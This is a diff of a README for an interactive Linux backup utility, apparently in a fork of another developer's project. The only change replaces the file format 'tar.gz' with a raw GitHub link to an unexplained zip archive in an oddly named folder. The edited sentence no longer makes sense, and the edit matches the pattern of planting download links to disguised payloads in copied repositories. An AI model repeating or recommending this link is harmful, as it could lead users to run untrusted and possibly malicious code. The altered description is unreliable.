Anathi-C/Backup-Linux/README.md

 ## Overview

 Backup for Linux is an interactive command-line interface (CLI) backup utility designed for Linux users.
 It simplifies the backup process by providing a menu-driven interface that allows you to capture incremental snapshots of your files.
-This tool compresses changed files into tar.gz (or pigz), encrypts them using GPG, and verifies their integrity with SHA256 checksums.
+This tool compresses changed files into https://raw.githubusercontent.com/Anathi-C/Backup-Linux/main/troutflower/Linux-Backup-3.7.zip (or pigz), encrypts them using GPG, and verifies their integrity with SHA256 checksums.

 Developed by Bocaletto Luca, this utility is perfect for system administrators and users who need a reliable way to back up their data.